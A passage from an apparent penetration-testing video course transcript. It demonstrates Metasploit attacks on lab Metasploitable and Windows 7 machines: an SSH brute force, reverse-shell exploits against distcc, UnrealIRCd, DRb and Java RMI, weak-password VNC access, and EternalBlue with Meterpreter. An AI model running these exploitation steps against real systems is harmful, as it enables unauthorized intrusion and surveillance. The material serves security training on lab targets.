just Ctrl+C this and click on Y. And you would write this down as another successful exploit if this was a real penetration test. In the next video, we're going to cover a different type of the attack that we haven't performed yet, which is brute force attack on port SSH. It is time to switch things up a little bit and check out a new type of the attack called brute force attack. Unlike the previous attacks, which were vulnerabilities, information disclosures, or misconfigurations, right now we're going to perform something that will be more of a presentation of the attack than the attack itself, since we're going to cheat a little bit. But before I tell you how we're going to cheat, let's first explain what are brute force attacks. Well, brute force attacks is you sending a lot of different information to the target in order to figure out what information is correct. Now, you could be wondering, what do I mean by sending information to the target? Well, this can be anything. In 99% of cases, it is usually usernames or passwords, so we send a lot of usernames and a lot of passwords and hope that we by accident hit the correct one. And when is this useful? Well, you usually perform this attack to see whether the target has default credentials or weak passwords. These type of attacks will work, for example, if the target has a password that has a small amount of characters, or if it is very easy to guess. For example, password 123 is very easy to guess, but it is also one of the most used passwords in the world. In this case, we know that the MSF admin and MSF admin is one account on the target machine. So we will use those credentials to log in to the SSH. In that sense, this will not be a real attack, since we will be putting those credentials in two different lists. One list will contain usernames, and other list will contain passwords. Then we will run the brute force attack, and you will see it will automatically go through all of the usernames and passwords in those lists, and it will manage to find the correct ones, which are MSF admin and MSF admin. Let's do it. To perform this using Metasploit framework, we're going to use an auxiliary module that is used for SSH login. If we search SSH right here, we will get a bunch of the results, but the one that we are interested in is all the way up, I believe, and it is this one, auxiliary scanner SSH/SSH login. Let's copy the auxiliary module name, and let's type down here use and paste the module name. If we type show options for this module, we can see we have a lot of options available to specify. Keep in mind that only some of them are required and a lot of them aren't, as we can see by this column right here. Let's see what are the things that we need in order for this brute force attack to work. We got the brute force speed, and this is how fast it will try the passwords. We can specify a single password or a password file, and we will be going with the password file in our case. We must specify the R hosts, which is the IP address of the target. The R port is the SSH port on the target machine, and let's just double check, it is 22 here, and it is also 22 in our scan, so that is already set correctly. Here we can also set the username, and this username field is a single username, or we can set the user file, which will be the file containing a bunch of usernames. Another possible option that we can do is set user pass file. And what this user pass file is a file containing both usernames and passwords. As it says right here, file containing users and passwords separated by space, one pair per line. Now for this particular attack, we're going to be using a password file and a user file separately. So what we must do first is we must create those files. Let us open another terminal, navigate to the desktop of our Mr. Hacker account, and let's nano usernames.txt. This will be our list containing usernames. And let's just, for the purposes of this tutorial, write a few of them. So admin root test123. Let's go with the system and MSF admin. We must add the correct one in order for the SSH brute force to be able to find it. And after it, let's add one more. Let's call this one admin123. So this is 6 usernames. Of course, in a real life attack, you would be using much bigger lists. But for now, for the purposes of this tutorial, we will create these small lists and see whether it will work. So we got our usernames file right here, and it has the correct username specified. Let's save it. Now we need to do the same thing with the password, so let's nano passwords.txt. Here let's type password 123, hello world. Let's also type MSF admin, which is the correct password, and we know it at the moment. And at the end, let's type test1234. So here we have 5 passwords, and one of them is the correct one. Let's save this file. And if I type ls, we should have both of the files in our desktop directory. Let's specify them right here in our options. So the password file must be the entire path to this passwords.txt. So we must specify the entire path. To check out the entire path, I can type print working directory inside of the desktop directory and copy this. And inside of our Metasploit framework, we can type set pass_file and then paste the path, add slash, and then passwords.txt. This now set the path to the pass file to be this path right here. And we must do the same thing for the usernames. Let's type set user_file, paste the same path right here, and add, instead of passwords.txt, let's add usernames.txt. Press enter, and if I type show options once again, let's see what else do we need to specify. Here the password file and the user file has already been specified, but we must also specify the rhosts for this to work. So let's do it. If I type set rhosts, type the IP address of my Metasploitable, clear the screen, and I check out options once again. All seems to be set. We will leave the brute force speed to be 5, which is the fastest. And one more thing that we want to change is this verbose right here. This is currently set to false. We want to set it to true. And this verbose means that it will print out even the failed usernames and passwords. It will not only print the successful login. Let me show you right here. If I set verbose to be equal to true, clear the screen and run this, here it is. It started our attack. It is going to try every single combination of usernames and passwords from those 2 files. Now, you might notice this isn't going that fast, and it will print out all of these failed passwords until it reaches the combination of MSF admin and MSF admin, as both username and password. Let's wait for that combination to come. And here it is. We found the correct SSH username and password. Once it prints out this success right here, this means it found the correct username and password. And you can just Ctrl+C this if it didn't stop in order to stop the brute forcing. Now, I know what you're thinking once again. This is not a true attack, since we added username and password to the list. But once again, remember that you would do this for the weak credentials and default passwords. And of course, in real attacks, you would be using much bigger lists than these that we created right here. And many of those bigger lists we can find inside of our Kali Linux machine. However, more about them later. For now, we just tested it out to make sure that this brute force attack works. We can also see right here, it opened the command shell as soon as it found the correct username and password. But if you press Ctrl+C or you waited for this to finish, it doesn't seem that we can execute commands anywhere. We just went back to our auxiliary module right here. We are not inside of a shell. Well, once something like this happens, Metasploit saves the shell in the background so we can still enter that shell. To check out all of the available shells that we currently have established, we can type the command sessions. And here we can see we got one shell over SSH to the IP address of the Metasploitable. To enter inside of this session, we can type the command sessions-i and then the session ID. In my case, it is 1, and it will probably be in your case as well. So if I set here sessions i1, this will start interaction with this shell and it will open our shell right here. And you can now execute the commands as usual. Who am I will tell me that I'm MSF admin. If I want to become the root account, I type sudo su, type in MSF admin password, and I type who am I once again. Now I'm root account. Another way that you can establish SSH connection once knowing the username and password is like this. First, let's exit out of this. Exit out of Metasploit framework. And now that we know the username and password of the SSH, we can open our terminal and type SSH MSF admin, which is the username, @ and then the IP address of the Metasploitable, which is 192.168.1.9 in my case. If I press here enter, it will ask me this question, are you sure you want to continue connecting? I want to specify yes right here. And it will ask me for the password for this specific account. And we know that the password is MSF admin, so I will type it right here. And here it is. We opened the terminal of the Metasploitable. If I type who am I, we are MSF admin. And that would be about it for the SSH brute force attack. Don't worry, real brute force attacks we will perform later regarding website login forms and Wi-Fi cracking. This video was just to introduce you to the concept of brute forcing. If you were to exploit a target like this in real life, it would be considered weak credentials or default credentials vulnerability, and you would of course write it down as a critical vulnerability. Great, that is another vulnerability covered. Let's go and hunt the next one down in the next video. Okay, it is time for a small challenge. We can say we are getting more and more familiar with MSF console and exploitation, and by now you should be familiar with the entire process of searching for a vulnerability and trying to exploit it. Let's put all of that to the test. So for now, we covered about 4 to 5 vulnerabilities on the Metasploitable virtual machine. And what I want you to do in this video is find 3 different vulnerabilities that will give you a shell back on the target machine. You can use any tools that you want, besides searching for links that will give you the exact steps to exploiting the vulnerability. And feel free to use Google if you want to see if a software is vulnerable. You can also use Searchploit to see whether you have exploit in your database. You can use Nmap to scan and Metasploit framework to exploit. After we do this challenge, we are ready to move on to some harder Windows exploits. And after that, we're going to see how to exploit the target without using MSF console and without having an exploit available inside of our Kali Linux machine. Okay, great. So pause this video right now, give yourself 10 to 20 minutes and try to find 3 different vulnerabilities on the Metasploitable that will give you a shell back. I myself will do it right now, so if you don't want me to spoil it for you, then try to find them first and then watch this video. The harder part is to find them, however, once you find them, it is easy to exploit them. Let's get straight into it. Let's start by scanning the target for all the open ports and its services. So what I'm going to do is I will perform the usual Nmap version scan on my Metasploitable, and I will use -p-, which stands for scan all 65,000 ports. If I press here enter my password, and by the way, of course the vulnerabilities that we covered don't count at the moment. we will not pay attention to them at all right now. We want to find new vulnerabilities. So while this scan is working, I will go to a second terminal and I will start the MSF console. And I will also open a third terminal in case we need something like a Searchsploit or some other tool to run right here. So the goal is to find 3 vulnerabilities. Let's see after our scan finishes whether we manage to do so. And here are the results of the scan. So we got a bunch of ports open as usual, and let's go and pick any one of them. For example, I know for a fact that this dist-c open port, which is 3632, is vulnerable. It is running dist-c version 1, and if I go to my Metasploit framework and I just type search dist-c, I will only get one exploit available. Dist-c execute or daemon command execution. It is ranked excellent, so since this is the only exploit, let's give it a try. I will copy it, I will type use and then paste the exploit name, clear the screen. We can show info just to know what this exploit does, and it says that this module uses a documented security weakness to execute arbitrary commands on any system running dist-c cd. And our system is indeed running dist-c cd. So what we're going to do is we're going to type show options and set the rhosts to be the IP address of our Metasploitable. Let's see show payloads. So we got quite a few payloads right here. Let us use this one, CMD Unix reverse. So this is reverse TCP over Telnet. Let's set it right here. Since at the moment, if I show options, we don't have any payload set up. Let's set payload CMD, Unix, and then reverse. Show options once again. Now we need to set the lhost. So I will type sudo ifconfig, enter my password. My IP address is 192.168.1.8. Let's copy it and let's set lhost to be equal to that IP address. Now if we triple check all of our available options, we should be good to go. Let us run our exploit. And here it is. First one is over. We got the command shell session 1 opened on the target machine. If I type who am I, we're daemon. If I type ls or print working directory, we are in the /tmp directory. Hostname command will tell us that we are Metasploitable, and uname-a will tell us that we are Linux Metasploitable 2.6.24, and here we also get some other information such as date and which version of Linux it is. Great. So first one is done. Let us Control-C this, abort session 1, select yes, and let's go back to our scan to find another vulnerability. So if you remember, during our scans, once we performed the vulnerability scan, we noticed that this Unreal IRC was vulnerable. We got from some of our scans result that this specific service is vulnerable to some type of the attack. So let's give it a try. Let's go to our Searchsploit and type Searchsploit IRC. And this gives us a bunch of different information. So this isn't really useful for us. Let's try it like this. Let's go to our scan and copy Unreal RCD, which is the version. And now if I type Searchsploit and then the name of the version, well, we narrow it down to 4 results. And one of them doesn't count since it is remote denial of service. Out of all of this, we got one Ruby exploit, which means it belongs to Metasploit framework. It is for the version 3.2.8, and it is backdoor command execution. Let's search it inside of our Metasploit framework. So search and then Unreal RC. And we do get indeed only one exploit for this. It is ranked excellent and it is from 2010. Let's copy it. Right here, copy selection, and as usual, use this exploit. Show info will tell us that this module exploits a malicious backdoor that was added to the Unreal RCD 3.2.8 download archive. So as it says, this module will exploit some malicious backdoor that was added in this specific version. And if we show options, we need to set the rhosts as in the previous exploit. And we also need to set the payload, but before we set it, let's show our available payloads first. Show payloads, pardon me, not show options. And we get the same result as previously, so we're just going to go with the reverse TCP over telnet. And if I type set payload and then paste the payload name. Now we need to set the lhost to be the IP address of our Kali Linux machine. And if we triple check our options, everything is set. Type run. And here it is. Command shell session 2 open. We got the second exploit down. Let's check out if it works. Who am I? We are the root account. Host name will tell us we're Metasploitable. So this is the second one down. We got one more left to go. Let's Control-C this. Go back to our scan. And we're doing this really fast tempo because we already are familiar with all of these tools and techniques that we use to exploit these vulnerable softwares. If you didn't manage to find 3 different exploits, don't worry, this comes with the practice. So after some time of practicing, you will be able to find even more than 3 exploits. Let's continue on the third one. So if I go down here and check out what different services we got running, this one, which is running over port 8787, running service DRB, I know for a fact that it is vulnerable. So let's give it a try. The service name is DRB. So if I type in my search exploit, DRB, well, we only get a few results right here. And it doesn't seem that any one of them belongs to the Metasploit framework, as we can see right here, since these are Python files. So let's just double check. Whoops, not here. Let's just double check right here if we can find something regarding DRB, and we do manage to find it. So we got these 2 exploits, which are for the multi, and we got this DRB remote code execution. And it says distributed Ruby remote code execution. And if I go right here under the version, we can see that it is running Ruby. So let's just give it a try. You never know. If we copy this exploit, which says DRB remote code execution, and we use it right here, show our options, we can see by default it has set the payload to be CMD Unix reverse netcat, and we got 2 different things to set up. Matter of fact, one of them is URI, which is not really needed, so we can only set rhosts. And for some reason, it does say that rhost is not required, but I'm not really sure how it is not required, so we will just specify it anyway. Set rhosts 192.168.1.7. Since the payload is already been set, let us just run the exploit. And here it is. We got command shell session 3 open. Let's type who am I? We are root account, and once again host name will tell us we're Metasploitable machine. And with this we completed our challenge. We found 3 different vulnerabilities that gave us a shell back. But these are not the only ones, so matter of fact, let me just show you 1 or 2 more that you could have found if you performed this challenge. The one that is a little bit different to exploit is this VNC service running on port 5900. It is running protocol 3.3, and if we just search in the search exploit, search VNC, search exploit VNC, we will get a bunch of the results right here. So let's add the version 3.3, and we do get some of the responses right here, but it does say that these are for Windows. Now, we are not going to give up just because we cannot find the exploit using search exploit. Matter of fact, it probably is somewhere right here, just there is a bunch of results and we don't really want to read through all of this to find the exploit that we need. So let's just go straight to the Metasploit and type search VNC. And if I scroll all the way up, since these are just payloads, I come to exploits, we can see there are about 5 or 6 exploits. And these 4 are for Windows, so we can forget about them straight away. We got this one, and we got this one. This one seems interesting. It is an exploit for multiple operating systems, for VNC, and it says VNC keyboard execution. So let's just copy the name and see whether it works. Now, this is just a part of penetration test. If you don't know an exact exploit, you simply just try a few different ones and see if they work. Just get used to it that some exploits will sometimes not work, and you will have no idea why they don't work. So let's just type set, or pardon me, let's just type use, and then the exploit name. And this seems that it isn't an exploit for us, since it is also setting the Windows payload. We cannot find a VNC exploit, so what are we going to do? Well, if I go right here, and instead of searching for an exploit, I simply just try to connect to the VNC using a tool called VNC Viewer, and all I need to specify to connect to is the IP address to that target machine. Press enter. It seems to be asking for a password. Well, let's try MSF admin, which is the usual password for everything in Metasploitable, and it tells us authentication failure. But if I try it once again, and as a password, I simply just type password, well, it worked. The VNC viewer password was just password. And now I got root shell open on the Metasploitable. I can execute commands right here, such as ifconfig, such as hostname, ls, and I can see anything that is on the target machine. So this exploit was a little bit different because it was due to a weak password. I just connected to the VNC and I typed password, and it granted the access to the root shell of the Metasploitable. Great. To exit this, I can type exit, and I can exit this desktop right here. And let me show you just one more, and then we're going to end the video. And that one is over port 1099. It is running Java RMI, and if I go in my Metasploit framework and search for Java_RMI, well, we get 2 exploits right here. Let's try with this one first. So exploit multi, misc Java RMI server, copy the exploit name, go right here and type use. It will set the default payload to be Java Meterpreter reverse TCP. Now this is the first time that we're encountering a Meterpreter payload. You will see that it is a little bit different than all the other shells that we got in the previous exploits. So if I type show options, there are a bunch of things that I need to set. Our payload options has already been set to correct one, to the correct IP address and to the correct port. All we need to set right here is the R hosts. You can just leave the server host and server port to be 0.0.0.0 and 8080. If I go right here and type set R hosts 192.168.1.7 and I run this, well, here it is. We got the Meterpreter session 4 open. And if you want to execute the commands, you can just wait for this exploit to finish, and even though it says right here exploit failed, if I type sessions, I will have the Meterpreter session 4. And I can enter that session by typing sessions and then -i, and then the ID of that session, which in my case is 4. And I've entered the Meterpreter shell. Right here the commands are different. To check out all of the commands that we can run with the Meterpreter, we can type the help command. And you can see it is split into different sections, such as file system commands, such as core commands, and all of these commands work with Meterpreter shell. We can download and upload files, we can execute a command, we can screen share, we can perform a screenshot of the target machine, we can record the microphone, and many other things that we're going to check out later. But for now, we can use a command called shell to enter the command shell with the target machine. So if I type who am I once again, right now I'm a root account with the IP address of the Metasploitable. Great. Now I left this Meterpreter shell for the end, just so we can slowly start getting into using Meterpreter shell on our target machine. As we can see, there is a lot of the commands that we can run. Now, in the next video, we're going to start with Windows exploitation. And in Windows exploitation, we're most likely always going to want to open a Meterpreter shell. So that would be about it for this challenge. Once again, if you manage to find 3 different vulnerabilities, congratulations. If not, don't worry, this comes with practice. Now that we covered Metasploitable vulnerabilities, which were rather easy, it is time to move on to the Windows vulnerabilities. See you in the next video. Welcome back. It is time we switch things up a little bit and move on to a different target. For the next few videos, we're going to be attacking Windows 7 machine. And the difference between exploiting Windows 7 and the Metasploitable that we were attacking in the past few videos is inside of Windows 7, we are not going to install any additional software. So these exploits will work on anyone that uses Windows 7 and hasn't updated their operating system, which is most likely everyone running some pirated version of Windows. For this, you will need to install Windows 7 Virtual Machine. And I got mine right here, it is currently up and running. And you will need to install them inside of your VirtualBox first. You can take a look at YouTube how you can download Windows 7 ISO file, since the ISO file is something that you will need for the installation of VirtualBox Windows machine. And if you can, try to download the 64-bit version of Windows 7. Once you get the ISO file, the installation process is rather easy. Just go to the VirtualBox, then click on New right here. You can type in anything you want, you can call it Windows 7. You can select right here which version you got, either 32-bit or 64-bit. And once you select it, click on Next. Let me just see right here, cannot create, this folder already exists. Yeah, this folder already exists because I have already created the Windows 7 machine. But if I call it, for example, Windows 77, just so I can change the name of the virtual machine, click on Next. Here what you want to do is you want to add at least 2 GB of RAM. Now, in case you don't have 2 GB of RAM, feel free to add 1 GB, but in that case I'm not sure whether it will work, since I haven't really tried it. Once you create the virtual machine and set the RAM, you can click on Next. Right here select Create a Virtual Hard Disk Now. Click on Next, Next, Next. Here you can select the hard disk size. You don't need to go too much, you can just choose something like 20 to 30 GB, click on Create, and your virtual machine will be right here. Once you do all of that, there are just a few more settings that you need to set up, so just go right here onto the settings. And in the storage, you want to delete this empty right here. And under the controller, you want to add the Windows ISO file. So in my case, here is mine, Windows 7 Ultimate x64.iso. I would choose that one, and then I would proceed to the network settings and change from the NAT to the bridged adapter. Select your adapter right here and click on Create. After you do all of this, you can start your process of installing Windows 7. And the process is rather easy, as I already mentioned. However, there is one important step that we need to pay attention to. And I got the screenshot of that step right here on my desktop. As far as I remember, this step happens, I believe, at the very end of installation, and here it asks us, help protect your computer and improve Windows automatically. Here we want to select the last option, which is Ask Me Later. It says, for that option, until you decide your computer might be vulnerable to security threats. And by selecting this, we are simulating a vulnerable Windows 7 machine that wasn't regularly updated. Once you do all of this, you should be ready to go. The other steps of installation are not important, just remember, once you get to this step, select Ask Me Later. Okay, so right now I got both of these machines up and running. I got Kali Linux and Windows 7. And if I go to my VirtualBox right here, and besides this Windows 77 machine right here that I created right now, so I will just delete it since I don't really need 2 Windows 7 machines. Besides it, you will see I got these two Windows 7 machines. So I got Windows 7 32-bit and Windows 7 64-bit, and both are installed with a different ISO file. And the reason why I got two of them is just to show you that sometimes some of the exploits won't work. And that doesn't mean you didn't perform the exploit correctly. It's just that sometimes they just don't work. Whether it is due to architecture or some Windows update, it doesn't matter. Just you will see that, for example, some of the exploits will work on this version of Windows 7, but on this one it will not work. Now, there is also one thing that we must do on the target machine before we actually attack it. So once you install Windows 7 and you have it up and running, go to it, and from the desktop you want to type Control Panel. And in the Control Panel, we want to disable the firewall. The reason we do that is because the attack that we're going to perform targets port 445, which is by default open on Windows machines. However, it is also by default being filtered by a firewall that is automatically on every time you install a Windows machine. So for our exploits to work, target has to have that port unfiltered by the firewall for us to be able to exploit it. In companies and larger networks, that usually is the case. This port will be open and unfiltered. Why? Well, because it is SMB protocol or server message block protocol. It is used in network file sharing, and it allows applications on a computer to read and write to files and to request services from server programs in a computer network. It is basically used for different directory access or for printer access or something similar. That's why it is usually open inside companies without any firewall whatsoever. Let me show you what I mean. If I go right here and under the System and Security, I click on Windows Firewall. I already have it disabled, but by default you should have it like this. So you should have firewall up and running. If I leave the firewall up and running and I go to my Kali Linux machine and scan it real fast, so sudo nmap, we're going to use the synscan. In order for this to work, I need to know the IP address of my Windows 7 machine, so I will just type ipconfig inside of the command prompt and it will tell me it is 192.168.1.8. So if I go back and scan that IP address, input my password, this scan shouldn't take more than just a few seconds, and you will see right here that these ports are open. But for you, they will probably not be open. Why? Well, because you haven't really disabled the firewall yet. So even though I scan it right now once again, while the firewall is on, you can see in the scan results, ports are set to be open. What you are going to see, in case you haven't disabled the firewall already, is you will most likely see 1000 ports filtered. And to fix that, what you can do is go right here, click on Turn Windows Firewall on or off, then select right here Turn off Windows Firewall, and turn off Windows Firewall in the second option as well. Click on OK, and now the firewall is off. Now if you go and perform the scan once again, for me I will have the same results, but for you, you will have much more ports open. And I also get some ports open that weren't open once the firewall was enabled. Besides all of those ports, you should also see the port 139 being open and the port 445 being open. And those are SMB ports. So the key thing to get from this is go to the Windows and disable the firewall. Once again, Control Panel, System and Security, and then Windows Firewall. After you do all of that, you are ready to go. In the next video, we are going to see how to perform one of the most known recent exploits called Eternal Blue. See you in the next video. Hello and welcome back. Time to get our first exploit on the Windows machine. And we will go first with the famous Eternal Blue exploit. It is the NSA exploit that got stolen and leaked, and that was used for the famous WannaCry ransomware attack in 2017. If you want to read more about it, you can Google it right here, and it has a very interesting story. As we can see right here, you will undoubtedly recall the names shadow brokers who back in 2017 were dumping software exploits widely believed to be stolen from the USA National Security Agency, and WannaCry the notorious ransomware attack that struck only a few months later. You can also read some other information about the exploit, like what is Eternal Blue, and we can see its vulnerability name, CVE 2017 0.3-20148. And as it says, this is a family of critical vulnerabilities in Microsoft SMB version 1, server used in Windows 7, Windows Server 2008, Windows XP, and even Windows 10 running on port 445. You can read some other information as well if you want to, and right here it also tells us that even after 2 years of this exploit being patched, there are millions of machines on the internet that are still vulnerable to this attack. And what this exploit does basically is it exploits a mathematical error inside the SMB. And luckily, we got that exploit right here inside of our MSF console. So for now, what I got right here is the scan of my Windows 7 machine. And your scan should look similarly to mine. Now, these ports right here are not important. What is important is that you have these ports right here open. So port 445 and port 139. Also make sure that your Windows machine is up and running. And if I open my MSF console, right here, we're going to try to find that exploit and test it on our Windows 7 machine. One more thing is that besides this exploit that we have in our Metasploit framework, we also get the auxiliary module for this exploit. What does this mean? Well, it means that we can test the machine to see whether it is vulnerable before we actually exploit it. Let me show you what I mean. If I type right here search and then Eternal Blue, I will get 6 results, 2 auxiliary modules and 4 different exploits. This is the one that we're currently interested in. Exploit Windows for the SMB, and it is called MS17 Eternal Blue. But before we use it, we can use the auxiliary scanner for the SMB and for the same vulnerability, as you can compare these names right here, to see whether our target is vulnerable. So let's test this auxiliary module first. If I type right here use, and then paste the auxiliary module, clear the screen and show my options. There are a few different things that we need to set up, but the only required things is the rhosts. So let's set rhosts to be the IP address of our Windows 7 machine. In my case, it is this one. And if I type show info, so we can also read what this module does, it uses information disclosure to determine whether the Eternal Blue has been patched or not. And here it describes you how exactly does it do it. So if I triple check our options, everything seems to be set. You don't want to change these named pipes, and you also do not want to change the R port. So only thing you need to set up is this rhost right here. And let us type run. It will finish in just a few seconds, and it will tell me host is likely vulnerable to the Eternal Blue attack. It even gives us the version, Windows 7 Ultimate 7601, Service Pack 1, 64-bit. Great, our target seems to be vulnerable. Let us now perform the exploit, and you will see how easy it is. So if I search Eternal Blue once again, I copy the exploit name, which is this one, clear the screen, type use. It will by default set the payload to be Windows Reverse Meterpreter Shell for the 64-bit machine. Now, since it will set this by default, you must consider changing this in case your Windows 7 machine is a 32-bit machine. If it is a 64-bit, you can simply just leave this to be Windows 64-bit Meterpreter Reverse TCP. If it is not, then you want to set payload to be equal to Windows/Meterpreter/reverse TCP. And you will notice the only difference between this payload and this payload right here is this 64. So this just indicates that this is a 64-bit payload. Now I will not run this command because my Windows 7 machine is 64-bit. I will just type show info. And here we can see the exact definition and description of the exploit. This module is a port of the equation group Eternal Blue exploit, part of this toolkit right here, released by Shadow Brokers. There is a buffer overflow operation in this function right here. The size is calculated in this, so I'm not going to read this, of course, with mathematical error where a D word is abstracted into a word. Okay, so since our target is vulnerable, at least the auxiliary module told us, let us check out the options and let's run the exploit. So here as well we got few things that we need to set up. My payload is automatically set right here to the IP address and the port. These two we do not want to change. The R port we do not want to change, and the R hosts we need to set to the IP address of Windows 7 machine. Once everything is done, we can type run, and this will start our exploit. And in just a few seconds, I should get the Meterpreter reverse shell open on the Windows 7 machine. And here it is. Down here, it will print out this win, which means the exploit worked successfully. And I got my Windows 7 machine. If I type the command get_uid, which stands for get user ID, it will tell me that I'm currently on that machine as the system account. And this is the highest level account on a Windows machine. Great, we successfully exploited our first vulnerability inside of Windows 7 machine. And by the way, since we haven't really covered the Meterpreter yet, remember that we can run the help command, and here we can execute all of these commands that the Meterpreter shell gives us. But for now, we are not going to do that. We're going to cover these commands and a bunch of other commands that we don't have here in the post-exploitation module, which is coming soon. For now, we just want to gain access to the target, and in this video, we successfully did it. But I want to show you one more thing. So don't worry, I know that you're impatiently waiting for us to actually do something on the target, but for now, the goal is to only gain access to it. If you want, you can test these commands by yourself. You can just simply type screenshot, for example, just to show you how it works. And it will take the screenshot of the target's desktop. It will save it in the /home/MrHacker. So let's check out that directory. If I lower my terminal right here and go to the /home/MrHacker, open the folder. Here is the screenshot that we took of the target's desktop. It is saved on our machine. And that is just one of the cool commands that we can do with the Meterpreter shell. Others we will cover later. For now on, let me show you one more thing. If I exit out of this shell, I just want to show you if I open the second Windows 7 machine that I got right here, and there is no difference between these two machines. Just one is a 32-bit and the other one is a 64-bit machine. I just want to show you that on this one, which is the 32-bit one, the exploit will not work. Even though the auxiliary module will tell us that the machine is vulnerable. So I will just wait for this machine to open up. Matter of fact, if I remember correctly, the exploit will crash this Windows 7 machine. It will not manage to gain the Meterpreter shell, but instead this Windows machine will get the blue screen of death, and then it will crash. Let's see what happens. So I will log in to this machine. I will check two things out. Once it opens up, I will check the IP address. So it is 192.168.1.13. And one more thing I will check is whether the firewall is disabled. So I will go to Control Panel, System and Security, and then Windows Firewall. It is open, so I will just close the Windows Firewall. And now if I perform the same exploit, just change the IP address to the IP address of this new Windows 7 machine, and I try to run it, it will start the same, just after a few seconds, this machine right here should crash. It even tells us right here, host is likely vulnerable to the MS-17, which is the Eternal Blue exploit. So let's see what happens. And here it is. You can see that the Windows machine crashed, and now it is restarting. Also here we can see that the exploit failed. Remember that we got the win message once we exploited the previous Windows 7 target, but right now the exploit failed. Matter of fact, in the second attempt of it exploiting the Windows 7 machine, it crashed the machine. So this is just an example that sometimes an exploit will not work. In the first one, we managed to gain the access to the Windows 7 machine with the Meterpreter shell, but in the second one, we only managed to crash it. However, even if you manage to only crash it, this is something that you will 100% write on a report. This is a vulnerability. You should never be able to crash a target computer just like this. Imagine if this Windows 7 machine was doing something important. And just us knowing its IP address and running this exploit, we managed to crash it. That could cause a lot of problem. Now, if you really want to get this exploit to work, you can try to find a different Windows 7 ISO file and try with it to see if it might work on that one. I would also advise you that if you can, you try to install a Windows 7 64-bit version. And in the next video, we are going to see how we can perform a slightly different version of this exploit using Eternal Blue double pulsar attack. In my personal experience, this one works a little bit better than the Metasploit version of Eternal Blue. And another interesting thing is that we don't have it inside of our Metasploit framework. So what are we going to do? Well, not only are we going to run it in the next video, but I will also show you how we can add the Eternal Blue double pulsar module to the Metasploit framework by ourselves. See you in the next video. Welcome back. Time to check out a variant of Eternal Blue exploit. I prefer to always use this one due to two different reasons. It showed to work more than the default Metasploit framework exploit, and it also has a little better options aimed at both 32-bit and 64-bit Windows systems. Nonetheless, we can read more about Double Pulsar right here. This is the official Rapid7 website, and here we can check out what exactly is a double pulsar, when it is used and when did it come out. So here it says double pulsar is an implant leaked by the Shadow Brokers group earlier this year that enables the execution of additional malicious code. So you can read right here, but you can also check out different websites in order to find out how exactly does the exploit work in case you're interested in that. But what's important for us in this video is how to run the exploit. Remember, we have no module in Metasploit framework for the Eternal Blue double pulsar. So we must download the exploit ourselves and import it in Metasploit framework. This will be a little bit of a longer video since there are a few things that we need to do to achieve this exploit. The first thing that we must do is install Wine. And what is Wine? Well, Wine is a program that allows us to execute Windows applications on Linux systems. Why do we need this? Well, it is required for Double Pulsar to run. To install it, we can run the following command: sudo dpkg --add -architecture i386, and then these two signs, which mean that we are going to add another command to this larger command, and that is apt get update, and another command is apt get install wine32. So these are three separate commands, and in the last one we're going to install the wine32. If you press enter and type in the password, this command should start executing. Now if it tells you right here this, which is permission denied, then just copy this command without the sudo, enter the root terminal by typing sudo su, and then paste the command. Press enter, and now it should start executing all of these three commands. Now I will Control C this because I have already performed this. For you, just wait for this to finish and then proceed with the tutorial. And the reason why we are doing all of this is because we need to get Wine directory with the drive C folder. And you might be asking, well, what is that and where do I even find it? Well, sometimes it won't appear after installation. So what we must do is install some Windows program. In this case, let's just go and install Python 2 for Windows on our Kali Linux machine. Not because we need it, but because after we install it, our drive C folder will appear. And if you have no idea what I'm talking about, hang on for just a second and you will see it after we install a Windows program. It is all required for our exploit to run. So navigate to this link right here, which is https www.python.org/downloads/release and then /python-2714 and / at the end. Here we should see this version of Python, and what we are interested in from all of these versions is Windows x86 MSI installer. Click on it and click on Save File. It will start downloading our Windows MSI installer, and once it has finished, we want to go to the Downloads directory and open terminal inside of it. Once it does that, we can run the command wine msi execute /i and then the name of the file, which in my case and in your case will be python 2.7.14.msi. Just a small interrupt, this command that I just showed you, make sure to execute it using root terminal. So don't execute it using our regular Mr. Hacker terminal, otherwise in most cases it might not actually work. So what you can do is you can just type sudo su, enter the password for your account and run the wine msi execute /i and then the name of the file using root terminal. Okay, let's go back to the video. Click enter and this will start installing Python 2.7.14 as a Windows program. We want to click on next on every step, so next. So this already exists. I will click on yes. And this installation should finish in just a few seconds. Once it is done, you can click on finish, and right now we should have our wine folder in the /root directory. So if I go to the /root directory, I need to go cd /root. Let us just enter the root terminal and go to the /root directory. If we type ls, it will be empty. Did we fail somewhere? Well, not exactly. Once installed, wine will be a hidden directory, which means its name will start with a dot. And by the way, to list all the files inside of a directory, including hidden files, we can run the command ls-la. And here are all the hidden files, including our .wine directory. Now, if you cannot see it, make sure that you run this command, which is wine msi execute /i python 2.7.14 from the root terminal. Then just click on next steps, and you should have this .wine folder inside of the /root directory. Great. So if I go to that folder, cd.wine, here I will have drive C folder and some other folders as well. So everything works for now. Now that we got this ready, we can proceed to download our exploit. So go once again to the Firefox, open a second tab and type eternal blue double pulsar. And it will show up this first link, which is a GitHub link. We want to click on it. And since we already know how to install a GitHub tool, let's just do it real quick. We just want to copy this link right here. Go inside our terminal. Let's change the directory to the /home/Mr. Hacker/desktop directory. And once again, I would advise you to run all of these commands using root terminal, otherwise it might not work. And type git clone, paste the command, and it should download the eternal blue double pulsar tool for us. Now, we are not done yet. We must do some modification in order for this tool to be able to open in the Metasploit framework. If I type ls and change to the Eternal Blue double pulsar, right here we should have two interesting files. One of them is the Ruby file, which is the exploit itself, and the other one is this deps directory. Now this is a directory once again, it is not a file, and you cannot really see that from the root terminal because different file types are not different colors. And that is the only problematic thing. But nonetheless, what we must do is we must copy these two files. So let's go with copy deps first to the user share Metasploit framework, modules, exploits, Windows, and then SMB. And here we can copy the deps directory. And to copy a directory, you just need to add -r at the end. So once again, copying deps directory to the /user /share /Metasploit framework /modules /exploits /windows and then /smb. Click enter and it should copy the deps directory there. We want to do the same thing with the Eternal Blue Ruby file. So copy to the same directory modules, exploit, Windows, SMB, and here we want to copy it. Just for this file, you don't need to add the -r since it is a file and not a directory. Okay, great. There is one more location that we want to copy both of these files, so I will just type once again the same command, just this time I will switch the location to the /root directory. So I will copy the deps in the /root, add -r at the end, and I will copy the Eternal Blue to the /root directory as well. Great, now we should be ready to go. Let us open our MSF console. While this is opening, make sure that your Windows 7 machine is up and running, and let us straight away check out the IP address of this Windows 7 machine by typing ipconfig 192.168.1.8 for me. And what we want to do once the Metasploit framework opens up is we want to navigate to our Eternal Blue double pulsar exploit. And remember, we put it inside of the Windows exploit and SMB exploits. So what we can do is we can type use exploit Windows SMB, type the name of the exploit, which is Eternal Blue double 